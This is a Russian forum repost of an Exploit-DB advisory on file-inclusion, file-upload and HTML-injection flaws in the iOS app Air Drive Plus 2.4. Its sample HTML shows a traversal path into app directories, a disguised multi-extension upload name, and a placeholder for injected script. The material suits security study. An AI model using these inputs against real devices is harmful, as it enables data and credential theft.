Exploit Air Drive Plus - Multiple Input Validation Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
38634
Проверка EDB
  1. Пройдено
Автор
BENJAMIN KUNZ MEJRI
Тип уязвимости
REMOTE
Платформа
IOS
CVE
N/A
Дата публикации
2013-07-09
Air Drive Plus - Multiple Input Validation Vulnerabilities
Код:
source: https://www.securityfocus.com/bid/61081/info

Air Drive Plus is prone to multiple input validation vulnerabilities including a local file-include vulnerability, an arbitrary file-upload vulnerability, and an HTML-injection vulnerability.

An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, obtain sensitive information, execute arbitrary script code within the context of the browser, and steal cookie-based authentication credentials.

Air Drive Plus 2.4 is vulnerable; other versions may also be affected. 

<tr><td><img src="Air%20Drive%20-%20Files_files/file.png" height="20px" width="20px"></td><td><a target="_blank" 
href="http://www.example.com/AirDriveAction_file_show/;/private/var/mobile/Applications";>;/private/var/mobile/Applications/</a></td>
<td>27,27KB</td><td align="center">2013-07-08 23:07:52</td><td align="center">
<a onclick="javascript:delfile("/private/var/mobile/Applications");" class="transparent_button">Delete</a></td></tr>

<tr><td><img src="Air%20Drive%20-%20Files_files/file.png" height="20px" width="20px"></td><td><a target="_blank" 
href="http://www.example.com/AirDriveAction_file_show/1337.png.gif.php.js.html";>1337.png.gif.php.js.html</a></td>
<td>27,27KB</td><td align="center">2013-07-08 23:07:52</td><td align="center"><a 
onclick="javascript:delfile("1337.png.gif.php.js.html");" 
class="transparent_button">Delete</a></td></tr>

<tr><td><img src="Air%20Drive%20-%20Files_files/file.png" height="20px" width="20px"></td><td><a target="_blank" 
href="http://www.example.com/AirDriveAction_file_show/[PERSISTENT INJECTED SCRIPT CODE!]1337.png">[PERSISTENT 
INJECTED SCRIPT CODE!]1337.png</a></td><td>27,27KB</td><td align="center">
2013-07-08 23:07:52</td><td align="center"><a onclick="javascript:delfile("[PERSISTENT INJECTED SCRIPT 
CODE!]1337.png");" class="transparent_button">Delete</a></td></tr>
 
Источник
www.exploit-db.com

Похожие темы